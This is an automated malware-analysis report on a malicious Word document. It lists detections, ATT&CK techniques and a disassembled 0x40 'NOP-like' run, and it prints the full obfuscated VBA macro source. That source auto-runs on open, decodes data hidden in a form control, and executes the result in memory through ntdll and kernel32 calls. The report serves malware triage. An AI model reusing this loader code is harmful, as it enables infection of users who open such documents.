Verdict: MALICIOUS
Risk Score: 190
Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute code. The presence of the 'GetObject' call and the ClamAV detection as 'Doc.Downloader.Macro' strongly suggest that the macro's primary function is to download and execute a secondary payload. No specific family could be identified, but the technique is consistent with macro-based malware delivery.
Heuristics (7)

- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set wdApp = GetObject(, "Word.Application")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script: `Private Sub Document_Open()` / `Dim compared As Byte`
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x40 bytes (0x40 is `inc eax` in 32-bit x86, so a run of it behaves like a NOP sled)
Disassembly (attempted x86 opcode disassembly of the flagged run, offsets 0x180D to 0x186C, 96 bytes):

```text
0000180D 40 inc eax
0000180E 40 inc eax
0000180F 40 inc eax
00001810 40 inc eax
00001811 40 inc eax
00001812 40 inc eax
00001813 40 inc eax
00001814 40 inc eax
00001815 40 inc eax
00001816 40 inc eax
00001817 40 inc eax
00001818 40 inc eax
00001819 40 inc eax
0000181A 40 inc eax
0000181B 40 inc eax
0000181C 40 inc eax
0000181D 40 inc eax
0000181E 40 inc eax
0000181F 40 inc eax
00001820 40 inc eax
00001821 40 inc eax
00001822 40 inc eax
00001823 40 inc eax
00001824 40 inc eax
00001825 40 inc eax
00001826 40 inc eax
00001827 40 inc eax
00001828 40 inc eax
00001829 40 inc eax
0000182A 40 inc eax
0000182B 40 inc eax
0000182C 40 inc eax
0000182D 40 inc eax
0000182E 40 inc eax
0000182F 40 inc eax
00001830 40 inc eax
00001831 40 inc eax
00001832 40 inc eax
00001833 40 inc eax
00001834 40 inc eax
00001835 40 inc eax
00001836 40 inc eax
00001837 40 inc eax
00001838 40 inc eax
00001839 40 inc eax
0000183A 40 inc eax
0000183B 40 inc eax
0000183C 40 inc eax
0000183D 40 inc eax
0000183E 40 inc eax
0000183F 40 inc eax
00001840 40 inc eax
00001841 40 inc eax
00001842 40 inc eax
00001843 40 inc eax
00001844 40 inc eax
00001845 40 inc eax
00001846 40 inc eax
00001847 40 inc eax
00001848 40 inc eax
00001849 40 inc eax
0000184A 40 inc eax
0000184B 40 inc eax
0000184C 40 inc eax
0000184D 40 inc eax
0000184E 40 inc eax
0000184F 40 inc eax
00001850 40 inc eax
00001851 40 inc eax
00001852 40 inc eax
00001853 40 inc eax
00001854 40 inc eax
00001855 40 inc eax
00001856 40 inc eax
00001857 40 inc eax
00001858 40 inc eax
00001859 40 inc eax
0000185A 40 inc eax
0000185B 40 inc eax
0000185C 40 inc eax
0000185D 40 inc eax
0000185E 40 inc eax
0000185F 40 inc eax
00001860 40 inc eax
00001861 40 inc eax
00001862 40 inc eax
00001863 40 inc eax
00001864 40 inc eax
00001865 40 inc eax
00001866 40 inc eax
00001867 40 inc eax
00001868 40 inc eax
00001869 40 inc eax
0000186A 40 inc eax
0000186B 40 inc eax
0000186C 40 inc eax
```
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All four URLs below are XMP/RDF metadata namespace identifiers found in the document body, not URLs referenced by the macro code.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13686 bytes | 61ee0c2ebe9de1fbabd7dcaba90f79efb4660873c7fcecb8a10b5928639d53f7 |

Preview script (first 1,000 lines of the extracted script; the extracted source is shown below exactly as decoded):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function matrimony(steroid, blenheim, bacchus)
Dim expropriation As Long
Dim machina As String
Dim putout As Long
Dim bowed As Variant
Dim ant As Long
Dim dredge As Long
Dim her As Long
Dim heathenism As Variant
Dim epispadias As Long
Dim recording As Long
Dim slagheap As Variant
anagram = "soonest"
fallacious = fallacious / 207
expropriation = steroid
epispadias = bacchus
ascetic = Fix(162)
ant = blenheim
jeremiah = 37 + 52
Pmt 0, jeremiah, 31081, 16262, 2
putting = putting
putout = 119 - 108 - 12
euronithopoda ByVal putout, expropriation, ant, epispadias, her
anagram = "doubt"
End Function
Sub SelectSentence()
Dim wdApp As Word.Application
Dim wdRng As Word.Range
Set wdApp = GetObject(, "Word.Application")
With wdApp.ActiveDocument
If .Paragraphs.Count >= 3 Then
Set wdRng = .Paragraphs(3).Range
wdRng.Copy
End If
End With
Worksheets("Sheet2").PasteSpecial
Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
Set wdApp = Nothing
Set wdRng = Nothing
End Sub
Private Sub Document_Open()
Dim compared As Byte
Dim allowed As Variant
quadrant = "chickadee"
plowshare = "bioclimatology"
reconversion
slenderly = 4 + 53
Pmt 0, slenderly, 14133, 23313, 4
End Sub
Sub reconversion()
Dim denizens As Byte
Dim awn As Long
viameter.mercy.Value = Day(#12/5/2013#)
varday = fled = "schmuck"
faineance = "colon"
adequate = "note"
mayhap = "embase"
impressionable = pathogenesis
progne = "obstante"
geraniales = unbridgeable
Set cheerlessly = viameter.mercy.SelectedItem
monomaniac = 11 + 53
Pmt 0, monomaniac, 38086, 29221, 3
defeasance = cheerlessly.Name
eversion = 72 - 70 + 7842
cretinism = Right(defeasance, eversion)
dismantled = featherbedding.megaloblast(cretinism)
translatable = 4 + 12
Pmt 0, translatable, 16658, 12444, 7
exporting = "dilated"
goodygoody = bevy
#If (80 - 22 + 342 + 94 - 90 + 296) > ((110 - 45 + 255) - (70 - 4 + 474) * 1) And ((68 - 85 + 45) - (51 - 19 - 4)) * 2 < (Win64) Then
Dim abudefduf As Integer
Dim broach As LongPtr
Dim lectin As LongPtr
Dim dicarboxylic As Integer
#ElseIf (55 - 31 + 376 + 52 - 38 + 286) > ((49 - 18 + 289) - (3 - 56 + 593) * 1) And Not ((34 - 13 + 7) - (86 - 61 + 3)) * 2 < (Win64) Then
Dim mailbag As Variant
Dim lectin As Long
Dim algonkian As Byte
Dim broach As Long
#End If
balustrade = 88 - 38 - 50
annexation = "aquating"
neofiber = "gamekeeper"
euge = 88 - 44 + 4052
cartilage = 7 + 43
Pmt 0, cartilage, 30796, 44183, 2
comprehend = menispermaceae
daviesia = "quaker"
activating = 35 + 21
Pmt 0, activating, 4967, 38250, 3
daygirl = dismantled
dracunculus = "disjunction"
broach = bondwoman(daygirl)
anemometry = "bullfinch"
fling = "region"
#If (117 - 121 + 404 + 9 - 28 + 319) > ((80 - 41 + 281) - (116 - 90 + 514) * 1) And ((31 - 82 + 79) - (24 - 118 + 122)) * 2 < (Win64) Then
Dim batholith As Variant
Dim circumfusion As LongPtr
Dim depressingly As LongPtr
Dim uprise As LongPtr
anamorphosis = 42 - 64 + 2086
#ElseIf (29 - 93 + 464 + 106 - 77 + 271) > ((66 - 24 + 278) - (5 - 82 + 617) * 1) And Not ((22 - 92 + 98) - (119 - 123 + 32)) * 2 < (Win64) Then
Dim circumfusion As Long
comate = 98 - 68 + 751
Dim depressingly As Long
Dim uprise As Long
anamorphosis = comate + 3459
#End If
Dim dismet As Variant
Dim anachronism As Long
circumfusion = 19 - 87 + 68
lectin = broach + anamorphosis
depressingly = 60 - 3 + 201470
uprise = 101 - 83 + 3482
cheap = confusing(depressingly, circumfusion, lectin, circumfusion, circumfusion, circumfusion, circumfusion)
phoradendron = 23 + 37
Pmt 0, phoradendron, 19060, 30074, 4
End Sub
Function bondwoman(biopsy)
Dim ailuropodidae As Variant
Dim ditchwater As Byte
Dim pahautea As Variant
Dim causeway As Long
#If (67 - 14 + 347 + 8 - 90 + 382) > ((26 - 119 + 413) - (6 - 104 + 638) * 1) And ((9 - 117 + 136) - (26 - 51 + 53)) * 2 < (Win64) Then
Dim arthrocentesis As Integer
Dim proximate As LongPtr
inflectional = 80 - 98 + 26
Dim misogyny As LongPtr
Dim endamage As Variant
Dim corruptly As Byte
Dim humbleness As LongPtr
Dim capo As Integer
compensate = VarPtr(proximate)
decollation = synapse(compensate, VarPtr(biopsy) + (9 - 85 + 84), inflectional)
#ElseIf (94 - 87 + 393 + 111 - 22 + 211) > ((19 - 81 + 382) - (89 - 14 + 465) * 1) And Not ((49 - 15 - 6) - (114 - 38 - 48)) * 2 < (Win64) Then
Dim proximate As Long
inflectional = 106 - 127 + 25
Dim misogyny As Long
Dim humbleness As Long
compensate = VarPtr(proximate)
decollation = matrimony(compensate, VarPtr(biopsy) + (117 - 44 - 65), inflectional)
#End If
oxybelis = 102 - 65 - 38
misogyny = 84 - 37 - 47
oceania = 1 - 40 + 39
humbleness = 102 - 89 + 9309
brownie = 76 - 106 + 4126
academician = 40 - 7 + 31
perpetuate = kyphosus(ByVal oxybelis, _
misogyny, ByVal oceania, humbleness, ByVal brownie, _
ByVal academician)
fallacious = Rnd(443)
anagram = "tungstate"
#If (124 - 128 + 404 + 89 - 92 + 303) > ((41 - 25 + 304) - (44 - 94 + 590) * 1) And ((37 - 72 + 63) - (109 - 65 - 16)) * 2 < (Win64) Then
although = synapse(misogyny, proximate, 75 - 10 + 5818)
#ElseIf (39 - 65 + 426 + 24 - 11 + 287) > ((27 - 99 + 392) - (40 - 50 + 550) * 1) And Not ((111 - 61 - 22) - (18 - 36 + 46)) * 2 < (Win64) Then
schistosome = matrimony(misogyny, proximate, 96 - 10 + 5797)
#End If
dactylopterus = 29 + 30
Pmt 0, dactylopterus, 13879, 11844, 4
bondwoman = misogyny
End Function
Function synapse(gout, alveolitis, wheeler)
Dim adjutant As String
Dim handbarrow As Integer
Dim glucocorticoid As LongPtr
Dim badlands As LongPtr
Dim tau As LongPtr
Dim overreaching As Integer
Dim arkansas As LongPtr
Dim aircraftsman As LongPtr
fallacious = Math.Round(451)
ascetic = Math.Round(199)
badlands = gout
aircraftsman = wheeler
fallacious = fallacious - 193
arkansas = alveolitis
periodontist = 39 + 35
Pmt 0, periodontist, 25883, 16910, 6
putting = "anticlimax"
glucocorticoid = 66 - 59 - 8
euronithopoda ByVal glucocorticoid, _
badlands, _
arkansas, aircraftsman, _
tau
putting = anagram
End Function
Attribute VB_Name = "featherbedding"
#If (58 - 39 + 381 + 95 - 15 + 220) > ((87 - 75 + 308) - (109 - 13 + 444) * 1) And ((30 - 119 + 117) - (19 - 116 + 125)) * 2 < (Win64) Then
Public Declare PtrSafe Function kyphosus _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (dura As LongPtr, boar As LongPtr, ByVal battleground As LongPtr,aerophagiaByVal As LongPtr, abstractedness As LongPtr, ByVal littleneck As LongPtr) As LongPtr
Public Declare PtrSafe Function confession _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal gurgoyle As Any, lacuslake As Any, appendicular As Any, disordered As Any) As LongPtr
Public Declare PtrSafe Function confusing _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (appointments As Any, ByVal randomize As Any, ByVal equitable As Any, ByVal lunchroom As Any, ByVal oversight As Any, ByVal trichechus As Any, ByVal beak As Any) As Long
Public Declare PtrSafe Function euronithopoda _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal theridiidae As Any, ByVal zetetic As Any, ByVal oscitant As Any, ByVal prelusive As Any, ByVal cunaxa As Any) As LongPtr
Public Declare PtrSafe Function aeschynanthus _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (shabbiness As Any) As LongPtr
Public Declare PtrSafe Function salvager _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal actinopoda As Any, quotation As Any, contestable As Any, scandalization As Any) As LongPtr
#ElseIf (122 - 103 + 381 + 76 - 128 + 352) > ((24 - 62 + 358) - (111 - 12 + 441) * 1) And Not ((73 - 82 + 37) - (119 - 107 + 16)) * 2 < (Win64) Then
Public Declare Function aeolian _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (parkeriaceae As Any) As Long
Public Declare Function confusing _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (copperplate As Any, ByVal snug As Any, ByVal ratcatcher As Any, ByVal lucid As Any, ByVal ephedrine As Any, ByVal sulla As Any, ByVal learn As Any) As Long
Public Declare Function euronithopoda _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal gradations As Any, ByVal chimneysweeper As Any, ByVal explicatory As Any, ByVal monsignor As Any, ByVal dossier As Any) As Long
Public Declare Function vault _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal chisel As Any, fiance As Any, mawkish As Any, napaea As Any) As Long
Public Declare Function nonexplosive _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal gestalt As Any, coverall As Any, areas As Any, agnize As Any) As Long
Public Declare Function kyphosus _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (antigenic As Long, plash As Long, ByVal acarpous As Long, countersignByVal As Long, stockcar As Long, ByVal prosit As Long) As Long
#End If
Function all(alcaid)
all = AscW(alcaid)
End Function
Function curculation()
Dim calcitic(255) As Byte
traitorous = 99 - 67 + 33
For i = traitorous To (78 - 65 + 78)
calcitic(traitorous) = traitorous - (52 - 83 + 96)
traitorous = traitorous + 1
If (116 - 69 + 44) < traitorous Then
milliammeter = camel + 40 - 29 + 54
Exit For
End If
diaskeaus = cordaitales + 50 - 22 + 37
Next
traitorous = (113 - 17 - 48)
For i = traitorous To (47 - 80 + 91)
calcitic(traitorous) = traitorous + (119 - 107 - 8)
traitorous = traitorous + 1
If (120 - 9 - 53) < traitorous Then
aware = millicurie + 47 - 72 + 90
Exit For
End If
methodist = dorm + 23 - 44 + 86
Next
traitorous = (35 - 96 + 158)
For i = traitorous To (6 - 77 + 194)
calcitic(traitorous) = traitorous - (51 - 108 + 128)
traitorous = traitorous + 1
subconsciously = less + 30 - 122 + 157
If (108 - 22 + 37) < traitorous Then
deific = demeaning + 103 - 53 + 15
Exit For
End If
guideline = actinomycin + 128 - 96 + 33
Next
calcitic(78 - 112 + 81) = (80 - 53 + 36)
traitorous = (94 - 123 + 72)
calcitic(traitorous) = (111 - 88 + 39)
curculation = calcitic
End Function
Function megaloblast(canteen) As String
Dim atharvaveda() As Byte
Dim downandout As Integer
Dim catalyst(63) As Long
anagram = "gesserit"
Dim outpouring As Long
Dim blut As Long
Dim saxe As String
Dim lamentably As Long
Dim asinorum As Long
Dim cheshire(63) As Long
Dim decursive(6962) As Byte
Dim astir(63) As Long
dryasdust = 20 - 76 + 258104
butyl = 35 - 92 + 312
Dim disobedience As Variant
asynchronism = 14 - 40 + 65562
malmsey = 97 - 119 + 85
musgu = 81 - 34 + 209
cyamopsis = 5 - 41 + 100
acalypha = 110 - 125 + 16515087
cladode = 48 - 36 + 262132
epanalepsis = 1 - 119 + 16711798
discoglossidae = 34 - 65 + 4127
Dim crossed As String
bollworm = 100 - 23 + 65203
dialogism = 126 - 111 + 4017
Dim nauran As Byte
Dim midiron As Integer
cyclades = 35 - 58 + 7866
Dim magnetohydrodynamics() As Byte
magnetohydrodynamics = VBA.StrConv(canteen, 120 + 8)
dandie = 22 + 1
Pmt 0, dandie, 39626, 46771, 4
decrement = 7843
dada = vbKeyShift - 12
For unangry = 0 To decrement
If unangry Mod 2 = 0 Then
magnetohydrodynamics(unangry) = magnetohydrodynamics(unangry) - dada
Else
magnetohydrodynamics(unangry) = magnetohydrodynamics(unangry) - (dada - 1)
End If
Next unangry
ectoplasm = 53 + 33
Pmt 0, ectoplasm, 38400, 18714, 6
downandout = 0
africanamerican = curculation
For blut = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
catalyst(blut) = colorimetric(blut, cyamopsis, 59)
astir(blut) = colorimetric(blut, discoglossidae, 59)
cheshire(blut) = colorimetric(blut, cladode, 59)
Next blut
boyishness = 1 + 35
Pmt 0, boyishness, 39686, 36044, 7
atharvaveda = magnetohydrodynamics
circumscribe = 103 - 70 - 29
boner = 55 + 4
Pmt 0, boner, 21726, 47023, 8
aller = 25 - 116 + 94
anagram = "chercher"
anagram = putting
halflight = aller + 1
cobbler = 57 - 101 + 46
For asinorum = 0 To decrement
drool = atharvaveda(asinorum)
herrerasaur = atharvaveda(asinorum + 2)
opiniative = astir(africanamerican(atharvaveda(asinorum + 1)))
dearborn = catalyst(africanamerican(herrerasaur)) + africanamerican(atharvaveda(asinorum + aller))
lamentably = cheshire(africanamerican(drool)) + opiniative + dearborn
blut = colorimetric(lamentably, epanalepsis, 51)
decursive(outpouring) = colorimetric(blut, asynchronism, 41)
blut = colorimetric(lamentably, bollworm, 51)
decursive(outpouring + 1) = colorimetric(blut, musgu, 41)
decursive(outpouring + cobbler) = colorimetric(lamentably, butyl, 51)
outpouring = outpouring + cobbler + 1
asinorum = asinorum + 3
Next
megaloblast = decursive
End Function
Function colorimetric(agraphic, nonruminant, dissociable)
Select Case dissociable
Case 41 + (10 / 2 - 5)
colorimetric = agraphic \ nonruminant
Case 51 + (5 - 3) / 2 - 1
colorimetric = agraphic And nonruminant
Case 59 + (56 / 7 - 4 * 2)
colorimetric = agraphic * nonruminant
End Select
End Function
Sub view()
Documents("Sample.doc").Windows(1).view.Type = wdNormalView
End Sub
Attribute VB_Name = "viameter"
Attribute VB_Base = "0{56806614-4AF4-4948-9366-C6CE73C03F2D}{6DE89D32-9A1A-4476-B691-E6905C185125}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False